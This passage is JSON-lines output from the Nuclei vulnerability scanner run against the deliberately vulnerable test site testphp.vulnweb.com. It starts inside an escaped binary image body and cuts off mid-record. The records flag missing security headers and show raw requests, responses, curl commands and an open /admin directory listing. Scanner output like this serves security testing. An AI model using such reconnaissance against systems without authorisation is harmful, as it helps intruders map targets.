\\ufffdC\\u0002\\u0001\\ufffd \\ufffd\\u003e|\\ufffd\\ufffdt\\ufffd:E\\ufffd\\ufffdQ\\ufffd\\u000b\\u001a\\ufffd\\ufffd\\ufffd6\\ufffdL\\u000c\\ufffd$\\ufffd\\u0007\\u0007\\ufffdy\\ufffd)\\ufffdH\\ufffd\\ufffd\\ufffd{\\u0010\\ufffdH6)\\ufffd\\u000fy\\u0004\\ufffd`\\ufffd)\\u0003h\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd{\\ufffdr(\\ufffd#\\ufffd\\ufffd\\ufffdRA)\\ufffd\\u001cřd\\ufffd\\ufffd\\ufffdo\\u0001p\\u0000-\\ufffd\\u003c\\ufffd\\ufffdx.\\ufffd\\ufffdO\\u000c\\ufffde\\ufffd\\ufffd\\ufffd(\\ufffd/z\\ufffd\\ufffdؘ\\ufffd\\ufffdwq\\u000e\\\"\\ufffd\\ufffd\\ufffdF\\u0006\\u003e\\ufffd\\ufffd|\\ufffdr\\t\\u0002\\ufffd\\ufffd4\\ufffd\\ufffdO\\ufffd\\ufffdsfR~\\ufffd]\\ufffdt\\u0008\\ufffd\\ufffd?a\\ufffd\\ufffd:w\\ufffd4x\\ufffd.\\u000c\\ufffd\\ufffd\\ufffd!V}\\ufffd˲\\ufffd\\ufffd;\\u001c\\ufffd\\ufffd\\u0006G\\u001d\\u000e\\ufffdk\\u0016\\ufffd\\ufffd\\ufffdjV\\ufffd]\\ufffdJZ(\\ufffd%L\\ufffd\\u0001\\t\\ufffdr\\u003ca8\\ufffd?\\ufffdB\\ufffd\\ufffd+\\ufffdㇷs4\\ufffd i~\\ufffd7\\ufffdt\\ufffd\\ufffd\\ufffdd\\u0019\\u0018\\ufffd\\u0008\\ufffdx+\\ufffd'\\u0019?P\\ufffd\\ufffd\\u001e2E%ݻ[L\\ufffd9R\\ufffd\\ufffdӑ\\ufffd\\u003ez|\\ufffd5\\u000bq\\ufffd\\u000bKkt@[q+\\ufffd\\u000e\\ufffd\\u0004\\u0003\\ufffd􁜌\\ufffd\\ufffdy4\\ufffd:\\u0016bO\\u0026\\ufffdknK,ViԨɬ\\ufffd\\u003ez5\\ufffdS\\ufffd)\\ufffd\\u0002\\ufffd@\\ufffd\\ufffd\\ufffdX㳑\\ufffd\\t\\u0016P\\ufffd\\u0007,\\ufffd\\ufffd\\u001f\\ufffd\\ufffd\\ufffdM\\ufffd庂\\ufffd\\u0026\\ufffd$\\ufffd\\t\\ufffdr\\u0007A\\ufffd\\u0012r8\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffdS\\ufffd\\\\Igw\\u0015\\ufffd\\r\\ufffdH\\ufffd\\ufffd8\\ufffd4æIst\\ufffd\\u000f#\\ufffd\\ufffd\\ufffd,\\ufffd\\ufffd\\u0007\\ufffd\\ufffd+\\ufffd\\ufffdU\\ufffd\\ufffd/^\\ufffd'\\ufffd\\ufffdY\\ufffd\\ufffd\\ufffd'\\ufffdh\\u001c\\ufffd\\u0019\\ufffdX\\ufffd\\ufffdH'\\ufffdv9\\ufffd`\\ufffdx\\ufffd\\r^oOI,m\\u0014L\\ufffd\\ufffd\\ufffdu\\u000b\\ufffd-\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffd\\ufffd\\ufffd\\u0018,:\\ufffd\\ufffdjz}\\ufffd\\u0007\\ufffd)\\u0019\\ufffd\\u001aC\\ufffd\\u0002O\\ufffd\\ufffd$\\ufffd\\ufffd\\ufffdƥo4A^DuG\\ufffd\\ufffd*@lw\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\te\\ufffdm\\ufffd\\ufffd2e\\u001d\\ufffd\\ufffdf#\\u001d\\ufffd\\ufffdj\\ufffd\\u0019\\ufffd\\u0015\\ufffd*\\ufffd\\ufffd\\ufffd#\\u0019\\ufffd\\u001a\\ufffd\\u0004+\\ufffdYZy\\u001a\\u0015\\ufffd\\ufffd1\\ufffd$)\\u003c\\u0003\\ufffd\\ufffd5\\\"\\ufffdc\\u0026\\ufffd'4f\\ufffd4S\\ufffd\\u0000\\ufffdk=\\ufffd\\ufffdo4r\\ufffdp\\ufffd\\ufffd\\ufffd\\ufffd\\u000e\\u0008\\ufffd\\ufffdׯJpj\\ufffd\\ufffd\\u0006\\ufffdL\\ufffdw\\ufffd\\u0007\\ufffde0\\ufffd\\ufffdVy\\u0002`g\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd'\\ufffdN\\ufffd\\ufffd\\ufffd\\ufffdu\\ufffdV\\ufffd\\ufffd,\\ufffd\\ufffd7\\ufffd\\ufffd'\\ufffd\\ufffd\\ufffd\\u0015=tx\\ufffd\\ufffdiV\\ufffdRM\\u003e\\ufffd$Aj\\ufffd\\ufffdG\\ufffdI!\\ufffd\\u0010U\\ufffd…\\u0003\\u0019\\ufffd$\\u001e\\ufffd\\ufffd\\ufffd*\\ufffdmF{۝\\ufffd;I+vO%\\ufffd\\ufffd\\ufffd4\\ufffd\\ufffd6y\\ufffd\\u0008\\u003c\\u000f\\ufffd\\ufffd\\ufffd\\ufffdԯ\\ufffd!\\ufffdb\\ufffd$\\ufffd\\ufffdx\\ufffd\\ufffd\\ufffd?\\ufffd\\ufffd\\ufffdU\\ufffdKo\\ufffd\\ufffdq\\ufffd\\ufffd\\ufffd@\\ufffd\\ufffd\\ufffd\\u0016f\\\\*㑜\\u0001\\ufffd\\ufffd\\ufffdI\\ufffd4\\ufffd\\ufffdi\\ufffd\\ufffdIyܤQ\\ufffd\\ufffdҾ\\ufffd\\ufffdX`\\u0005’A\\ufffd'\\u0004`.y\\ufffd\\ufffd/\\ufffd]\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd:\\ufffd\\ufffd6\\ufffd\\ufffd\\u001f\\ufffdg\\u0008\\ufffd\\ufffd4i-\\ufffdz:\\ufffd\\u0011gP\\ufffd\\ufffdQ\\ufffd0\\ufffd\\u0011\\ufffd\\ufffdi\\ufffd\\ufffd\\ufffd'\\ufffd\\ufffd\\ufffddG[\\ufffd\\u001c\\ufffd\\u001fO8a\\ufffd\\u0006F\\u0008\\ufffd{\\ufffd\\ufffdt}D\\ufffd\\ufffd\\ufffd5\\u0008\\ufffd\\ufffd0!\\ufffd\\ufffd\\u0012\\ufffd\\u000c9\\u001d\\ufffd\\ufffd\\ufffd2s\\ufffd5\\ufffdu\\r\\u003e\\ufffdloo\\ufffd\\ufffd]\\u001cY\\ufffd\\ufffd\\ufffd+.v\\ufffd\\u003e\\ufffd\\ufffd(@\\ufffd\\u0001 \\u0013\\ufffdL'\\ufffdt\\ufffd\\ufffd9Y\\ufffd\\ufffdTs\\ufffd\\ufffd5\\ufffd5l\\ufffd\\u000b\\ufffd\\\"m\\ufffd\\u001c\\ufffd\\ufffd\\ufffdp\\ufffd\\ufffd\\ufffdL\\u000c\\ufffd\\ufffd5\\ufffdo48\\ufffdNE;U%\\ufffd\\ufffd,\\ufffd\\ufffdm\\u0007h\\ufffd'\\ufffd@\\ufffdy\\u0002\\ufffd}R \\ufffd\\ufffd-\\ufffd\\ufffd\\ufffd\\u0000\\n\\ufffdpO\\u001f\\ufffd5\\ufffdU\\ufffd\\ufffdh\\ufffd\\ufffd\\u0015\\ufffd\\ufffdX\\ufffd\\ufffd\\ufffdN\\u003e\\ufffd\\ufffd㑭g\\u001704\\ufffd!V\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u001fW\\ufffdO\\ufffd\\u0007\\ufffd\\ufffd\\u000bk\\t\\u0007\\ufffd\\ufffd\\ufffd%[Y\\ufffdC\\u0012\\ufffd\\ufffdA]Č\\u0010A\\ufffdG\\ufffd]\\u001a\\ufffd\\ufffd\\ufffd\\ufffd\\u001eL\\ufffd\\ufffdY\\ufffd9\\ufffdcX\\ufffd\\ufffdI!\\ufffd\\ufffdVF#*\\u0003.\\u00187\\u001fP\\u003c\\ufffd\\u0000\\t\\ufffd\\u003c\\ufffdՑ\\ufffdI}$\\ufffd\\\"\\ufffd\\ufffdv\\ufffd\\ufffd\\n\\ufffd\\ufffd\\u003e\\ufffdx\\ufffdd\\ufffd\\ufffd\\ufffd\\r\\ufffd\\u001f\\ufffd\\ufffdM\\ufffdu\\ufffd}+\\ufffd\\u0008 \\u001f\\ufffd\\u0003\\u0000\\ufffd\\ufffd\\ufffd\\u0019M\\ufffd'\\ufffd\\ufffdY#\\ufffdf%[\\ufffd[\\ufffd\\u003ej\\ufffd\\ufffd6\\ufffd\\u0007,4\\ufffdy\\u001elVh\\ufffdY-\\ufffd\\ufffdH\\ufffd\\ufffd\\u0019\\ufffd\\ufffdd\\ufffd\\ufffdc\\ufffd\\ufffd\\ufffd\\ufffd\\u0003A4~夤{\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd}\\ufffd^\\ufffdۊ\\ufffdY\\u0011\\u001c\\ufffd\\ufffd\\u0005\\u0015\\ufffd\\ufffd\\u0014\\n\\ufffd\\ufffdp\\u0013S\\ufffdE\\u0015D\\u0003\\ufffdbO\\u003c\\ufffd\\ufffd\\u001b\\ufffd0e8 \\ufffdV1R*ѐ\\u0006\\ufffd\\ufffd\\ufffd.\\ufffdm\\u0004\\ufffdOs \\ufffd\\ufffd\\ufffds\\ufffd6H]\\ufffd\\ufffd`\\ufffd\\ufffd\\ufffd\\ufffd3U\\u000b1' \\ufffdx⽣\\u001c\\ufffd\\ufffd%\\ufffd\\ufffd\\ufffd?W\\ufffdg\\ufffd2\\ufffd\\\"F\\ufffd#\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0003\\ufffd'\\ufffd\\ufffdO4v\\ufffdi\\ufffd1\\u0012_N\\ufffd\\ufffd=\\ufffd\\u0006\\ufffd\\ufffd\\u0004p\\u003e9?\\u001d\\ufffd+\\ufffd\\ufffd\\ufffdMoq\\u001c\\ufffd\\u0001d`ps\\ufffd\\ufffdW\\u0010\\ufffd\\ufffd\\ufffd\\ufffdsp=ûs\\ufffdO?\\ufffd\\ufffd?\\ufffd\\ufffd\\ufffdDlk+op\\ufffdt\\ufffd\\ufffdEw\\ufffdZ_\\ufffd\\ufffdݐ\\ufffd`VN\\u001c\\ufffd[ \\u000c\\ufffd\\u0015\\ufffdx\\ufffd\\ufffdrMd\\ufffdZD~\\ufffd\\ufffd3%\\ufffdO\\ufffd4\\ufffd7\\u003e\\ufffd3\\ufffd\\u0007\\ufffddc\\u0019$p\\u003cҶ\\ufffd\\ufffd\\ufffd\\ufffdxgc\\ufffd\\ufffdxQ\\ufffd\\u0001\\ufffd4Ţ\\ufffdq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdp#Q\\ufffd?[s\\ufffd\\u001cu\\ufffd\\ufffdk\\ufffdzkj\\ufffd:^%\\ufffdv\\u0019I7\\ufffd\\ufffdU\\ufffd\\\"\\ufffd{\\ufffdɍF\\ufffd\\ufffdBeKd}\\u0001\\ufffdF@a\\ufffd\\ufffd\\ufffd\\u0003\\ufffd\\ufffd\\ufffd\\ufffdۙIPpA\\ufffd\\ufffdNWZ\\ufffd\\u0017\\ufffd\\ufffd\\u0015U}\\ufffdm\\ufffd\\ufffd\\u0004\\ufffd\\ufffd\\ufffdH\\r\\ufffdĆ\\u0004s\\ufffd?\\ufffd\\ufffdWv*\\u0016K\\ufffdܬ,#۵]\\ufffd\\ufffd\\ufffd9;A\\u0003\\ufffd9\\u0000.y'\\ufffdZuҩF\\u001a\\ufffd\\ufffd\\ufffd\\ufffd3\\ufffdx34\\ufffd(\\ufffd\\ufffd\\ufffdC\\u0004;\\ufffd\\u0008\\ufffd`%m\\ufffd\\ufffd\\u0001\\ufffd\\ufffd\\ufffd#?I\\u000c\\u0000\\ufffdx\\u00002\\ufffd\\ufffd\\u0002=\\ufffd\\u0018\\ufffd\\u0005?$\\u001c\\ufffd\\ufffd\\ufffdx,e\\ufffdBM\\u0019u_i\\ufffd\\u001fKl\\ufffd\\u003e\\u0006_\\ufffd\\ufffd \\u000f\\ufffd\\ufffd]\\u0026\\ufffd\\ufffd\\ufffd\\ufffdH\\ufffdSsl\\ufffdtI\\u00260\\ufffd7\\u0001\\ufffd\\ufffd\\ufffd:\\u001eǒ9\\u0015\\u001d.\\ufffd\\ufffd3\\ufffdM\\ufffd\\ufffd\\ufffdC(\\ufffd\\ufffd\\ufffdLѣ}\\u003ev\\ufffd\\ufffd*\\ufffd1\\ufffd\\ufffd\\u003e\\ufffd\\u0007\\u0018$\\ufffd0r\\t\\ufffd~\\ufffdi\\u001d\\ufffd\\ufffdΰF\\ufffd2\\ufffd\\ufffd񗍷3`+\\u0012\\ufffd\\u0018\\ufffd\\ufffd\\u0001\\ufffdH\\ufffdHQ\\ufffd\\ufffdʉmqs\\ufffd\\ufffdgEf\\ufffd-\\ufffd\\ufffd\\u0007gh*3\\ufffd2\\ufffd\\u001b\\u0003\\ufffd\\ufffdq\\ufffd5\\ufffd\\ufffd\\ufffd\\ufffdM\\ufffd2-\\ufffd˔\\\"Ux\\ufffd,Y\\ufffd\\u0000\\ufffdv\\n\\ufffd\\ufffd\\u001c\\u000e2AbR\\ufffd\\ufffd6\\ufffdJ\\ufffd\\ufffd\\ufffd=\\ufffd\\ufffd\\ufffd[\\ufffd7\\ufffd\\u0014Q]\\ufffd\\u000f\\u0014T\\ufffd*\\ufffd\\u000c(\\ufffd\\ufffdt\\u0002EM@\\ufffd\\u0015D\\u0002jS\\ufffd\\ufffdEd\\ufffdI\\ufffd\\ufffd\\ufffd32\\ufffd\\ufffd\\ufffdb=\\u001a\\ufffd\\u001a\\u001cV\\ufffd)\\ufffd\\ufffd\\ufffd\\u0001\\ufffd\\t?\\ufffdo۱\\u0015\\u001a5\\ufffd\\ufffd\\ufffdXZU\\ufffdp$3\\u001e8\\u001f\\ufffd\\\\\\ufffd\\u0002x\\ufffdY\\ufffd\\ufffd\\ufffd\\ufffd12\\ufffd\\ufffd\\u0003r\\ufffd?\\ufffd\\ufffdԳ\\ufffd\\ufffd8=ؼ\\ufffdՔ\\ufffde9\\u0004v*\\ufffd\\ufffd\\ufffd,\\u0011f\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd8l6d!rz\\u0019$*\\ufffd\\ufffd\\u0001\\ufffd+oC\\ufffd\\ufffd\\ufffd޳J\\ufffdy\\u0002'\\ufffd\\ufffd(9w\\ufffd\\ufffd\\u0007\\ufffd\\u001f\\ufffd\\ufffd\\u0004\\ufffd[S\\ufffd\\u0016{d\\ufffd\\ufffd\\ufffdtL^!\\ufffd\\u0014ۺ \\ufffd;X\\ufffdCt\\ufffd#\\u001e;\\ufffd'\\ufffd\\ufffdk\\ufffd\\ufffd\\ufffd\\ufffduHu\\u001cn\\ufffd\\ufffd4n\\ufffdb\\u000b\\u0013\\ufffd9\\ufffd!o(H\\ufffdV$\\ufffdg\\ufffd!\\ufffd0\\u0007q\\u0019\\ufffd\\ufffd}D\\ufffd:\\ufffd\\ufffd\\u0008w\\ufffdVT`Tgk\\u00021\\ufffd\\u001f\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdrj\\ufffd\\ufffdk\\ufffd'\\ufffd\\ufffdK\\u0016f\\u0003h\\ufffd\\ufffd\\ufffd\\ufffd[J\\ufffdv\\ufffd\\u001bk\\ufffd\\ufffd \\ufffd,b\\u0011Š\\ufffd\\u0026a\\ufffd\\ufffd\\ufffd\\ufffdX\\u0012\\ufffd2\\ufffdI\\ufffd\\ufffd\\u0002\\ufffd\\ufffdT|\\u003e\\ufffd\\ufffdi4\\ufffd\\ufffd\\ufffd\\ufffdl\\ufffd\\ufffd\\n\\ufffd\\ufffd\\ufffd;eܜu\\ufffd\\ufffd\\ufffd\\u0000|\\ufffdE\\ufffd\\ufffdܶ\\u0000$\\ufffdv\\ufffd\\u0001$\\ufffdN\\u0007\\u0003\\ufffdO\\ufffd\\ufffd}Ci\\u001a\\u0004\\ufffd\\ufffd9\\ufffdl2ZE*I?lq\\ufffd羱Ks[\\ufffd\\u0014\\ufffdӴvq\\ufffd\\ufffdz\\ufffd\\ufffdȩǂMcc\\ufffdQE\\u0015ć\\n\\ufffd(\\ufffd\\ufffdI4\\n(\\ufffd@\\u0026\\ufffdE\\u0015X\\ufffd\\ufffd\\ufffd\\ufffdO\\ufffd\\ufffdЬo4幞6i\\\"i\\u001c\\ufffd\\\\H\\u0001L+\\u000f\\ufffdOX\\u003c\\ufffd\\ufffd\\n+Zڎ\\ufffdB\\ufffdȾ\\ufffda@\\u0019\\ufffdx\\ufffd\\u001d\\n\\u0008澉%@\\ufffd͂\\ufffd\\ufffd)\\ufffd\\ufffd\\ufffd\\u000e\\ufffdV\\ufffdh\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0011\\ufffd\\ufffd!=\\ufffd\\u000c\\u001e?\\ufffd\\ufffd\\ufffd\\ufffdwcmh\\ufffd\\ufffd\\ufffd\\r\\ufffd6|1\\u003c}L\\u0015G\\ufffd@\\n\\u0007\\ufffd\\u0014Q^}\\ufffd~fs\\ufffd\\ufffd!\\ufffd\\u0005\\ufffd\\ufffd#\\ufffd\\ufffd\\ufffd\\ufffdيX\\ufffd\\ufffd\\ufffd\\ufffdWyB\\ufffd\\u003c\\ufffd\\ufffd=\\u001c\\ufffd\\u0019\\ufffd\\ufffdj\\ufffdԒ46dE\\ufffdW\\ufffd#*\\ufffd\\u0002D\\ufffds\\ufffd\\ufffd~\\ufffd\\u001c\\ufffdsE\\u0015\\ufffd\\ufffdb\\ufffd\\ufffd7-\\ufffdI\\ufffd\\\"\\ufffd\\u00126\\ufffd\\ufffdA\\u0006\\ufffd4]\\ufffd\\ufffd]\\u001b\\ufffd\\ufffd5\\ufffd\\u0008cx\\ufffd\\ufffd1\\ufffdъ\\ufffd\\u001c\\ufffdt\\ufffd\\ufffdA\\ufffdS\\ufffd\\ufffd\\ufffdEz\\u003e3\\ufffd\\u000b\\ufffd%|\\ufffd\\ufffd\\ufffdMSF\\ufffd\\ufffd\\ufffd\\n\\ufffdI\\ufffdrG\\ufffd\\ufffd1\\ufffdI\\ufffd:żp\\ufffd\\ufffdl\\u0017r\\ufffd\\u0017\\u0001\\ufffd\\ufffd\\u0002\\ufffd\\u0015\\ufffd\\u001fO\\u0003\\ufffd\\ufffd\\u0001\\ufffd\\u0002\\ufffd(\\ufffdj\\ufffdK\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:15.121442935Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15' 'http://testphp.vulnweb.com/pictures/1.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-resource-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop\",\"path\":\"/Mod_Rewrite_Shop\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/\",\"request\":\"GET /Mod_Rewrite_Shop HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:56.0) Gecko/20100101 Firefox/56.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003cdiv id=\\\"content\\\"\\u003e\\r\\n\\t\\u003cdiv class='product'\\u003e\\u003ctable\\u003e\\u003ctr\\u003e\\u003ctd width='180px'\\u003e\\u003cimg src='images/1.jpg'\\u003e\\u003c/td\\u003e\\u003ctd width='400px'\\u003e\\u003ca href='Details/network-attached-storage-dlink/1/'\\u003eNetwork Storage D-Link DNS-313 enclosure 1 x SATA\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd width='50px' bgcolor='#F8F8F8'\\u003e\\u003ca href='Details/network-attached-storage-dlink/1/'\\u003ePrice\\u003cbr\\u003e359 \\u0026euro;\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/table\\u003e\\u003c/tr\\u003e\\u003c/div\\u003e\\u003cdiv class='product'\\u003e\\u003ctable\\u003e\\u003ctr\\u003e\\u003ctd width='180px'\\u003e\\u003cimg src='images/2.jpg'\\u003e\\u003c/td\\u003e\\u003ctd width='400px'\\u003e\\u003ca href='Details/web-camera-a4tech/2/'\\u003eWeb Camera A4Tech PK-335E\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd width='50px' bgcolor='#F8F8F8'\\u003e\\u003ca href='Details/web-camera-a4tech/2/'\\u003ePrice\\u003cbr\\u003e10 \\u0026euro;\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/table\\u003e\\u003c/tr\\u003e\\u003c/div\\u003e\\u003cdiv class='product'\\u003e\\u003ctable\\u003e\\u003ctr\\u003e\\u003ctd width='180px'\\u003e\\u003cimg src='images/3.jpg'\\u003e\\u003c/td\\u003e\\u003ctd width='400px'\\u003e\\u003ca href='Details/color-printer/3/'\\u003eLaser Color Printer HP LaserJet M551dn, A4\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd width='50px' bgcolor='#F8F8F8'\\u003e\\u003ca href='Details/color-printer/3/'\\u003ePrice\\u003cbr\\u003e812 \\u0026euro;\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/table\\u003e\\u003c/tr\\u003e\\u003c/div\\u003e\\u003c/div\\u003e\\r\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:15.305432058Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:56.0) Gecko/20100101 Firefox/56.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-permitted-cross-domain-policies\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/admin\",\"path\":\"/admin\",\"matched-at\":\"http://testphp.vulnweb.com/admin/\",\"request\":\"GET /admin HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_6_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:35 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003eIndex of /admin/\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ch1\\u003eIndex of /admin/\\u003c/h1\\u003e\\u003chr\\u003e\\u003cpre\\u003e\\u003ca href=\\\"../\\\"\\u003e../\\u003c/a\\u003e\\r\\n\\u003ca href=\\\"create.sql\\\"\\u003ecreate.sql\\u003c/a\\u003e 11-May-2011 10:27 523\\r\\n\\u003c/pre\\u003e\\u003chr\\u003e\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:15.305466501Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_6_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36' 'http://testphp.vulnweb.com/admin'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"content-security-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/cgi-bin/status\",\"path\":\"/cgi-bin/status\",\"matched-at\":\"http://testphp.vulnweb.com/cgi-bin/status\",\"request\":\"GET /cgi-bin/status HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4861.152 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=iso-8859-1\\r\\nDate: Wed, 13 Nov 2024 02:41:39 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//IETF//DTD HTML 2.0//EN\\\"\\u003e\\n\\u003chtml\\u003e\\u003chead\\u003e\\n\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\n\\u003c/head\\u003e\\u003cbody\\u003e\\n\\u003ch1\\u003eNot Found\\u003c/h1\\u003e\\n\\u003cp\\u003eThe requested URL was not found on this server.\\u003c/p\\u003e\\n\\u003chr\\u003e\\n\\u003caddress\\u003eApache/2.4.46 (Ubuntu) Server at localhost Port 8000\\u003c/address\\u003e\\n\\u003c/body\\u003e\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:16.027137738Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4861.152 Safari/537.36' 'http://testphp.vulnweb.com/cgi-bin/status'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"permissions-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/5.jpg.tn\",\"path\":\"/pictures/5.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/5.jpg.tn\",\"request\":\"GET /pictures/5.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: 